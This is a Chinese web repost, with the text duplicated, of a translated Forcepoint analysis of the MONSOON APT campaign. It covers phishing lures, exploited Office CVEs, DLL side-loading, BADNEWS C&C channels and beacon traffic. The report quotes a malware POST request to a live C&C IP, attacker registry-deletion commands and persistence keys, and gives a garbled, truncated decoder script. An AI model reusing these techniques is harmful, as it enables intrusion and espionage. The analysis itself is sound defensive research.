• 关于我们 联系我们
当前位置:安全行业动态 → 正文

MONSOON APT:印度针对中国和其它周边国家发起的APT攻击

责任编辑:editor004 |来源:企业网D1Net  2016-08-16 15:33:54 本文摘自:黑客与极客

*声明:出于研究参考目的,本文为ForcePoint报告翻译,文中涉及的观点和立场不代表本网站观点和立场。

SSSSSSSSS.png

  Monsoon:(印度洋的)季风,季风雨,夏季季风

一、 概述

MONSOON APT攻击演变:根据Forcepoint研究人员收集的证据显示, MONSOON组织已存在六年之久,其某些攻击组件与2013年被Blue Coat发现的Operation Hangover相同。还可能与最近被Cymmetria发现的Patchwork和Kaspersky发现的Dropping Elephant,以及国内安天团队发现的“白象的舞步”相关。本报告对MONSOON APT进行了深入的研究调查,囊括了之前未被发现的恶意软件、受害者和攻击架构。

MONSOON APT的攻击目标:主要针对中国不同行业和南亚区域国家政府部门。MONSOON从2015年12月开始发起攻击,截至2016年7月攻击活动仍处于持续状态。MONSOON通过向特定目标发送含有恶意附件的鱼叉式邮件进行渗透攻击,这些邮件主题内容多为政治和时事话题。

MONSOON APT使用的复杂恶意软件:MONSOON使用了多个恶意软件,包括 Unknown Logger Public键盘记录器、TINYTYPHON、BADNEWS 和AutoIt Backdoor。其中,BADNEWS利用RSS订阅、GitHub、论坛、博客和动态DNS主机向远程C&C服务器进行通信,比较独特,因此我们把其命名为BADNEWS。(此BADNEWS非感染Andriod平台的BADNEWS)

谁是MONSOON APT的幕后攻击者?基于对MONSOON的调查分析结合各项威胁指标,我们认为MONSOON和Operation Hangover存在高度相似,可能为来自于印度的APT攻击。(Operation Hangover经调查分析被认为是由印度发起的APT攻击 )

二 、技术分析

1 初始调查动机

VirusTotal线索:VirusTotal(VT)智能分析功能经常被用来对新型可疑文件进行查询对比,MONSOON的调查就起源于我们在VirusTotal上的查询结果,其中被识别的一个RTF文档让我们更加坚定了继续调查的决心。

CyberCrime Bill/BADNEWS线索:一个特殊文档:“Cyber_Crime_bill.doc” 或“TelecommunicationsPolicy –APPROVED.DOCX”,VirusTotal的分析结果:低检测率,低提交数,包括阿拉伯语、英语和中文语言,利用了已知的CVE-2015-1641漏洞。该文档以政治主题为文件名,释放的未知恶意软件通过博客和RSS等方式与远程C&C服务器进行通信,并被我们的调查人员命名为BADNEWS。

文档作者线索:通过对原始RTF恶意文档进行信息挖掘,发现了最后修改文档的作者信息:

图1.jpg

  使用VT搜索,以下6个匹配文档的作者信息被发现:

PIC2.jpg

这些文档的VT检测结果、文件大小和相同的漏洞利用代码让我们更加肯定为同一攻击者所为。VT对以上文档的检测结果中还包含了样本文件名,其中一个为“china_report_EN_web_2016_A01.doc” ,其真实文档为日本防卫研究所对中国国防政策的研究报告。

PIC3.png

VT的检测结果还显示其中一个恶意文档的提交IP为37.58.60.195,该IP提交过多个恶意软件,另一个VT检测结果显示了其恶意文档的分析结果。

PIC4.png

传播机制:另外,攻击者通过比利时Your Mailing List Provider (YMLP)公司提供的在线文档储存服务t.ymlp50.com进行文件中转,同时利用YMLP公司的邮件服务发送鱼叉式钓鱼邮件。

2 钓鱼邮件诱饵文档

为了吸引收件人注意,钓鱼邮件的主题通常是与中国时事政治相关的主题,以下为其中一例:

PIC5.png

就像以上的邮件样例,攻击通过YMLP的邮件服务伪造发件者,并嵌入恶意文档下载链接。以下为一些钓鱼邮件样例的相关信息:

PIC6.png

  3 时事新闻诱饵

新闻网站:攻击者通过建立运行虚假政治新闻网站chinastrat.com,利用网站下载功能提供恶意文档传播途径,同时,通过大量邮件链接传播,吸引用户注册并获取相关密码账户信息。

PIC7.png

GooglePlus:攻击者自2014年12月以来一直在操作运行一个Google Plus账户,该帐户是用来发布虚假新闻网站chinastrat.com的相关链接。

PIC8.png

FACEBOOK:攻击者操作运行着一个FACEBOOK帐户,这个帐户也被用来发布虚假新闻网站chinastrat.com相关的链接。

PIC9.png

TWITTER:自2014年12月起,攻击者操作运行着一个twitter帐户,其功能与Facebook和Google Plus一样。

PIC10.png

  二、 恶意软件分析

1 “武器化”文档

漏洞利用:MONSOON攻击的恶意软件组合了几种文档型漏洞,攻击者利用了某种恶意文档生成器批量生成了这些貌似常规的“武器化”文档。以下是几个被利用的漏洞:

PIC11.jpg

BADNEWS武器化”文档:BADNEWS恶意软件被攻击者以一个加密二进制大对象文件BLOB(binary large object) 捆绑在一个诱饵文档中。漏洞CVE-2015-1641被用来释放和植入BADNEWS恶意软件,一旦漏洞利用代码被触发,其shellcode将把二进制大对象以一个加密的VBScript释放到用户的%temp%目录:

PIC12.jpg

这个加密的VBScript以.domx或.lgx格式结尾,最终,shellcode通过执行这个VBScript,从二进制大对象blob中提取并执行加密诱饵文档,达到植入恶意软件目的。后文将介绍BADNEWS更多详细功能。以下为VBScript从二进制BLOB中提取诱饵文档的编码:

PIC13.jpg

AutoIt 后门&Unknown Logger武器化文档大多数“武器化”文档都会释放并植入AutoIt 后门文件,以下是利用CVE-2014-6352漏洞植入AutoIt 后门的INF文件信息:

XXX.jpg

  AutoIt后门木马通过不同的伪装程序运行:

ccccc.jpg

  “武器化”文档同时也会释放一个Unknown Logger记录器(后文将作分析)。

TINYTYPHONTYPHON: 信号器,喇叭):MONSOON攻击中的第三种恶意软件是基于MyDoom类蠕虫的小型后门程序,该后门程序通过抓取本地和映射磁盘文档并上传至远程C&C服务器。在我们的分析中,利用了CVE-2012-0158的样本文件“DPP_INDIA_2016.doc”曾释放过该后门程序。样本文档中包含的shellcode在%temp%目录下释放svchost.exe程序,并尝试通过命令关闭WORD恢复功能:

cmd.exe/c reg delete “HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

cmd.exe /c reg delete”HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

文档释放的svchost.exe程序用来执行一个base64加密的内置恶意组件“TINYTYPHON”(后文将作分析)。

2 潜在的SILVERLIGHT组件漏洞

提供“武器化”文档的站点cnmilit.com和newsnstat.com,会把用户重定向到文件lite.php,通过lite.php获取恶意文档。以下是lite.php的访问示例:

PIC14.jpg

Silverlight识别:据分析,攻击者可能通过请求lite.php?name= true or false识别目标系统是否安装有Silverlight软件,然后利用Silverlight漏洞执行下一步渗透。以下为Silverlight识别代码:

PIC15.jpg

  3 恶意软件BADNEWS

BADNEWS能够执行任意命令,截图,自我更新,下载并执行文件以及列目录操作。BADNEWS利用DLL旁加载(dll side-loading)以实现免杀,如果目标有价值,将会进行第二阶段恶意软件的部署渗透。

DLL Side-Loading:BADNEWS的DLL组件通常被旁加载注入到一个合法签名java程序中。通过对一个样本文档的分析发现,样本文档释放一个二进制大对象和一个加密VBScript脚本,在VBScript脚本提取诱饵文档的同时,生成以下三个文件:

microscmgmt.exe、 MSVCR71.dll、 jli.dll

其中MicroScMgmt.exe就是旁加载注入合法进程javarmi.exe之后的恶意程序,它通过调用合法的MSVCR71.dll和恶意jli.dll达到执行恶意软件目的。MicroScMgmt.exe一旦执行,它将加载jli.dll,最终调用DLL组件中的jli_wildcardexpandclasspath_0出口,此时,BADNEWS将执行自身恶意程序。这种恶意软件的旁加载是一种隐形和免杀技术,该恶意软件将产生两个线程,一个执行键记录,另一个获取本地和映射硬盘驱动器文档。

持久驻留:BADNEWS通过在注册表中生成以下注册表项达到在受害者系统的持久驻留:

HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

C&C通信 :BADNEWS中包含有获取远程C&C服务器指令的固定通信代码和方式,这些方式包括RSS订阅、GitHub,论坛、博客和动态DNS主机。在我们的分析样本中,发现了其中一些残存和停用的通信方式:

BADNEWS中包含有获取远程C&C服务器指令的固定通信代码和方式,这些方式包括RSS订阅、GitHub,论坛、博客和动态DNS主机。在我们的分析样本中,发现了其中一些残存和停用的通信方式:

hxxp://feeds.rapidfeeds.com/81913/

hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml hxxp://www.webrss.com/createfeed.phpfeedid=47448 hxxp://www.webrss.com/createfeed.phpfeedid=47449

hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-in-thailand.html

hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy

hxxp://overthemontains.weebly.com/trekking-lovers

hxxp://tariqj.crabdance.com/tesla/ghsnls.php

hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php

hxxp://asatar.ignorelist.com/tesla/ghsnls.php

前7个C&C通信方式都是“blog”或“feed”方式,最后3个动态DNS主机方式为前7个信道的备份通信方式,其中请求的文件名“ghsnls.php”似乎都是相同的,但上一级目录名根据不同的攻击活动和恶意软件,经常发生变化,如:

tesla、Tussmal、Mussma、quantum、yumhong

恶意软件会从Blog或Feed方式网页中搜索并提取“ {{”内的字段以获取C&C信息。以下为一个Github样例:

PIC17.jpg

另一个例子是来自网站chinasmack.com中名为“Zubaid12″的用户评论:

PIC18.jpg

  以及来自论坛forum.china.org.cn的评论:

PIC19.jpg

“{{”之后的内容是以相同方式加密的C&C地址信息,但现在论坛上这篇文章已经看不见了,因为作者已经把它设置为白色文本背景。

C&C运行机制:BADNEWS与C&C服务器之间建立连接之后,将会向C&C服务器发送受害者系统相关信息,同时为受害者系统在%temp%目录生成一个带有独特编号的文件:“%temp%T89.dat“

POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1

Accept: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

User-Agent:UserAgent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1

Host: 85.25.79.230

Content-Length: 249

Cache-Control: no-cache

esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted**

C&C服务器的所有通信数据都是通过把每字节循环右移3bit,然后以023进行异或操作,之后再以16进制内容进行Base64加密。以下是对数据进行解密的一个Python脚本:badnews_decoder.py

importsys,getopt importbase64

# Rotate left: 0b1001 -->0b0011

rol = lambda val, r_bits, max_bits:

(val <

((val &(2**max_bits-1)) >>(max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 -->0b1100

ror = lambda val, r_bits, max_bits:

((val &(2**max_bits-1)) >>r_bits%max_bits) |

(val <<(max_bits-(r_bits%max_bits)) &(2**max_bits-1))

if len(sys.argv) !=2:

exit("Usage: badnews_decoder.py")

data=sys.argv[1]

# Print original data input print"[1]Original: " +data

data= base64.b64decode(data)

# Print the base64 decoded hex bytestring print "[2]Base64dec: " +data

# Decode the hex bytes into to binarydata data =data.decode("hex")

decdata=''

# XOReach byte by 0x23 and rotate left by 3bits for x inrange(len(data)):

c =ord(data[x]) c ^=0x23

c =rol(c, 3, 8) decdata +=chr(c)

# Null terminate decdata +='

 

关键字:文档MONSOON

本文摘自:黑客与极客

x MONSOON APT:印度针对中国和其它周边国家发起的APT攻击 扫一扫
分享本文到朋友圈
当前位置:安全行业动态 → 正文

MONSOON APT:印度针对中国和其它周边国家发起的APT攻击

责任编辑:editor004 |来源:企业网D1Net  2016-08-16 15:33:54 本文摘自:黑客与极客

*声明:出于研究参考目的,本文为ForcePoint报告翻译,文中涉及的观点和立场不代表本网站观点和立场。

SSSSSSSSS.png

  Monsoon:(印度洋的)季风,季风雨,夏季季风

一、 概述

MONSOON APT攻击演变:根据Forcepoint研究人员收集的证据显示, MONSOON组织已存在六年之久,其某些攻击组件与2013年被Blue Coat发现的Operation Hangover相同。还可能与最近被Cymmetria发现的Patchwork和Kaspersky发现的Dropping Elephant,以及国内安天团队发现的“白象的舞步”相关。本报告对MONSOON APT进行了深入的研究调查,囊括了之前未被发现的恶意软件、受害者和攻击架构。

MONSOON APT的攻击目标:主要针对中国不同行业和南亚区域国家政府部门。MONSOON从2015年12月开始发起攻击,截至2016年7月攻击活动仍处于持续状态。MONSOON通过向特定目标发送含有恶意附件的鱼叉式邮件进行渗透攻击,这些邮件主题内容多为政治和时事话题。

MONSOON APT使用的复杂恶意软件:MONSOON使用了多个恶意软件,包括 Unknown Logger Public键盘记录器、TINYTYPHON、BADNEWS 和AutoIt Backdoor。其中,BADNEWS利用RSS订阅、GitHub、论坛、博客和动态DNS主机向远程C&C服务器进行通信,比较独特,因此我们把其命名为BADNEWS。(此BADNEWS非感染Andriod平台的BADNEWS)

谁是MONSOON APT的幕后攻击者?基于对MONSOON的调查分析结合各项威胁指标,我们认为MONSOON和Operation Hangover存在高度相似,可能为来自于印度的APT攻击。(Operation Hangover经调查分析被认为是由印度发起的APT攻击 )

二 、技术分析

1 初始调查动机

VirusTotal线索:VirusTotal(VT)智能分析功能经常被用来对新型可疑文件进行查询对比,MONSOON的调查就起源于我们在VirusTotal上的查询结果,其中被识别的一个RTF文档让我们更加坚定了继续调查的决心。

CyberCrime Bill/BADNEWS线索:一个特殊文档:“Cyber_Crime_bill.doc” 或“TelecommunicationsPolicy –APPROVED.DOCX”,VirusTotal的分析结果:低检测率,低提交数,包括阿拉伯语、英语和中文语言,利用了已知的CVE-2015-1641漏洞。该文档以政治主题为文件名,释放的未知恶意软件通过博客和RSS等方式与远程C&C服务器进行通信,并被我们的调查人员命名为BADNEWS。

文档作者线索:通过对原始RTF恶意文档进行信息挖掘,发现了最后修改文档的作者信息:

图1.jpg

  使用VT搜索,以下6个匹配文档的作者信息被发现:

PIC2.jpg

这些文档的VT检测结果、文件大小和相同的漏洞利用代码让我们更加肯定为同一攻击者所为。VT对以上文档的检测结果中还包含了样本文件名,其中一个为“china_report_EN_web_2016_A01.doc” ,其真实文档为日本防卫研究所对中国国防政策的研究报告。

PIC3.png

VT的检测结果还显示其中一个恶意文档的提交IP为37.58.60.195,该IP提交过多个恶意软件,另一个VT检测结果显示了其恶意文档的分析结果。

PIC4.png

传播机制:另外,攻击者通过比利时Your Mailing List Provider (YMLP)公司提供的在线文档储存服务t.ymlp50.com进行文件中转,同时利用YMLP公司的邮件服务发送鱼叉式钓鱼邮件。

2 钓鱼邮件诱饵文档

为了吸引收件人注意,钓鱼邮件的主题通常是与中国时事政治相关的主题,以下为其中一例:

PIC5.png

就像以上的邮件样例,攻击通过YMLP的邮件服务伪造发件者,并嵌入恶意文档下载链接。以下为一些钓鱼邮件样例的相关信息:

PIC6.png

  3 时事新闻诱饵

新闻网站:攻击者通过建立运行虚假政治新闻网站chinastrat.com,利用网站下载功能提供恶意文档传播途径,同时,通过大量邮件链接传播,吸引用户注册并获取相关密码账户信息。

PIC7.png

GooglePlus:攻击者自2014年12月以来一直在操作运行一个Google Plus账户,该帐户是用来发布虚假新闻网站chinastrat.com的相关链接。

PIC8.png

FACEBOOK:攻击者操作运行着一个FACEBOOK帐户,这个帐户也被用来发布虚假新闻网站chinastrat.com相关的链接。

PIC9.png

TWITTER:自2014年12月起,攻击者操作运行着一个twitter帐户,其功能与Facebook和Google Plus一样。

PIC10.png

  二、 恶意软件分析

1 “武器化”文档

漏洞利用:MONSOON攻击的恶意软件组合了几种文档型漏洞,攻击者利用了某种恶意文档生成器批量生成了这些貌似常规的“武器化”文档。以下是几个被利用的漏洞:

PIC11.jpg

BADNEWS武器化”文档:BADNEWS恶意软件被攻击者以一个加密二进制大对象文件BLOB(binary large object) 捆绑在一个诱饵文档中。漏洞CVE-2015-1641被用来释放和植入BADNEWS恶意软件,一旦漏洞利用代码被触发,其shellcode将把二进制大对象以一个加密的VBScript释放到用户的%temp%目录:

PIC12.jpg

这个加密的VBScript以.domx或.lgx格式结尾,最终,shellcode通过执行这个VBScript,从二进制大对象blob中提取并执行加密诱饵文档,达到植入恶意软件目的。后文将介绍BADNEWS更多详细功能。以下为VBScript从二进制BLOB中提取诱饵文档的编码:

PIC13.jpg

AutoIt 后门&Unknown Logger武器化文档大多数“武器化”文档都会释放并植入AutoIt 后门文件,以下是利用CVE-2014-6352漏洞植入AutoIt 后门的INF文件信息:

XXX.jpg

  AutoIt后门木马通过不同的伪装程序运行:

ccccc.jpg

  “武器化”文档同时也会释放一个Unknown Logger记录器(后文将作分析)。

TINYTYPHONTYPHON: 信号器,喇叭):MONSOON攻击中的第三种恶意软件是基于MyDoom类蠕虫的小型后门程序,该后门程序通过抓取本地和映射磁盘文档并上传至远程C&C服务器。在我们的分析中,利用了CVE-2012-0158的样本文件“DPP_INDIA_2016.doc”曾释放过该后门程序。样本文档中包含的shellcode在%temp%目录下释放svchost.exe程序,并尝试通过命令关闭WORD恢复功能:

cmd.exe/c reg delete “HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

cmd.exe /c reg delete”HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

文档释放的svchost.exe程序用来执行一个base64加密的内置恶意组件“TINYTYPHON”(后文将作分析)。

2 潜在的SILVERLIGHT组件漏洞

提供“武器化”文档的站点cnmilit.com和newsnstat.com,会把用户重定向到文件lite.php,通过lite.php获取恶意文档。以下是lite.php的访问示例:

PIC14.jpg

Silverlight识别:据分析,攻击者可能通过请求lite.php?name= true or false识别目标系统是否安装有Silverlight软件,然后利用Silverlight漏洞执行下一步渗透。以下为Silverlight识别代码:

PIC15.jpg

  3 恶意软件BADNEWS

BADNEWS能够执行任意命令,截图,自我更新,下载并执行文件以及列目录操作。BADNEWS利用DLL旁加载(dll side-loading)以实现免杀,如果目标有价值,将会进行第二阶段恶意软件的部署渗透。

DLL Side-Loading:BADNEWS的DLL组件通常被旁加载注入到一个合法签名java程序中。通过对一个样本文档的分析发现,样本文档释放一个二进制大对象和一个加密VBScript脚本,在VBScript脚本提取诱饵文档的同时,生成以下三个文件:

microscmgmt.exe、 MSVCR71.dll、 jli.dll

其中MicroScMgmt.exe就是旁加载注入合法进程javarmi.exe之后的恶意程序,它通过调用合法的MSVCR71.dll和恶意jli.dll达到执行恶意软件目的。MicroScMgmt.exe一旦执行,它将加载jli.dll,最终调用DLL组件中的jli_wildcardexpandclasspath_0出口,此时,BADNEWS将执行自身恶意程序。这种恶意软件的旁加载是一种隐形和免杀技术,该恶意软件将产生两个线程,一个执行键记录,另一个获取本地和映射硬盘驱动器文档。

持久驻留:BADNEWS通过在注册表中生成以下注册表项达到在受害者系统的持久驻留:

HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

C&C通信 :BADNEWS中包含有获取远程C&C服务器指令的固定通信代码和方式,这些方式包括RSS订阅、GitHub,论坛、博客和动态DNS主机。在我们的分析样本中,发现了其中一些残存和停用的通信方式:

BADNEWS中包含有获取远程C&C服务器指令的固定通信代码和方式,这些方式包括RSS订阅、GitHub,论坛、博客和动态DNS主机。在我们的分析样本中,发现了其中一些残存和停用的通信方式:

hxxp://feeds.rapidfeeds.com/81913/

hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml hxxp://www.webrss.com/createfeed.phpfeedid=47448 hxxp://www.webrss.com/createfeed.phpfeedid=47449

hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-in-thailand.html

hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy

hxxp://overthemontains.weebly.com/trekking-lovers

hxxp://tariqj.crabdance.com/tesla/ghsnls.php

hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php

hxxp://asatar.ignorelist.com/tesla/ghsnls.php

前7个C&C通信方式都是“blog”或“feed”方式,最后3个动态DNS主机方式为前7个信道的备份通信方式,其中请求的文件名“ghsnls.php”似乎都是相同的,但上一级目录名根据不同的攻击活动和恶意软件,经常发生变化,如:

tesla、Tussmal、Mussma、quantum、yumhong

恶意软件会从Blog或Feed方式网页中搜索并提取“ {{”内的字段以获取C&C信息。以下为一个Github样例:

PIC17.jpg

另一个例子是来自网站chinasmack.com中名为“Zubaid12″的用户评论:

PIC18.jpg

  以及来自论坛forum.china.org.cn的评论:

PIC19.jpg

“{{”之后的内容是以相同方式加密的C&C地址信息,但现在论坛上这篇文章已经看不见了,因为作者已经把它设置为白色文本背景。

C&C运行机制:BADNEWS与C&C服务器之间建立连接之后,将会向C&C服务器发送受害者系统相关信息,同时为受害者系统在%temp%目录生成一个带有独特编号的文件:“%temp%T89.dat“

POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1

Accept: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

User-Agent:UserAgent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1

Host: 85.25.79.230

Content-Length: 249

Cache-Control: no-cache

esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted**

C&C服务器的所有通信数据都是通过把每字节循环右移3bit,然后以023进行异或操作,之后再以16进制内容进行Base64加密。以下是对数据进行解密的一个Python脚本:badnews_decoder.py

importsys,getopt importbase64

# Rotate left: 0b1001 -->0b0011

rol = lambda val, r_bits, max_bits:

(val <

((val &(2**max_bits-1)) >>(max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 -->0b1100

ror = lambda val, r_bits, max_bits:

((val &(2**max_bits-1)) >>r_bits%max_bits) |

(val <<(max_bits-(r_bits%max_bits)) &(2**max_bits-1))

if len(sys.argv) !=2:

exit("Usage: badnews_decoder.py")

data=sys.argv[1]

# Print original data input print"[1]Original: " +data

data= base64.b64decode(data)

# Print the base64 decoded hex bytestring print "[2]Base64dec: " +data

# Decode the hex bytes into to binarydata data =data.decode("hex")

decdata=''

# XOReach byte by 0x23 and rotate left by 3bits for x inrange(len(data)):

c =ord(data[x]) c ^=0x23

c =rol(c, 3, 8) decdata +=chr(c)

# Null terminate decdata +='

 

关键字:文档MONSOON

本文摘自:黑客与极客

电子周刊
回到顶部
网站地图

企业网D1Net 信众智-CIO社交平台 第1培训-企业数字化培训平台 会展活动

CIO 数字化转型 云计算 数据中心 大数据 元宇宙 物联网 人工智能 安全

移动办公 服务器 存储 访谈 区块链 数据网络 智慧城市 视频会议 芯片

统一通信 企业应用软件 创新技术 新闻中心

联系我们:

d1neteditor#d1net.com (发送邮件时,请把#换成@)

投稿信箱:

d1neteditor#d1net.com (发送邮件时,请把#换成@)

关于我们联系我们版权声明隐私条款广告服务友情链接投稿中心招贤纳士

企业网版权所有 ©2010-2024 京ICP备09108050号-6 京公网安备 11010502049343号

^